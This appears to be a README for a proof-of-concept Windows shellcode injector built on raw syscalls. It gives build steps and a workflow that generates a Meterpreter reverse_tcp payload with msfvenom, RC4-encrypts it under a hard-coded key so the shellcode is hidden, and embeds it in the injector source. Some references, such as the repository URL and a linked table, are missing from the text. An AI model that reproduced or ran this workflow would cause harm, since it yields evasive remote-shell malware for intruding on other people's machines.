This library builds and makes a shellcode injector for all versions of Windows using raw syscalls.
This code is a PoC and has only been tested windows 10 x64 version 1909, this is because of the syscall numbers changing between versions, the values can be found here.
git clone
cd DefensiveInjector
make _XP_SP2
make injector
The _XP_SP2 value is the define string for the shellcode.asm file, this will target specific versions of windows.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw -o meter.bin
Keeping in mind that if you change it here you will need to update the key on line 132 in
cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin
xxd -i encmeter.bin
then replace everything between line 10-60 with the output
sudo apt install mingw-w64 nasm python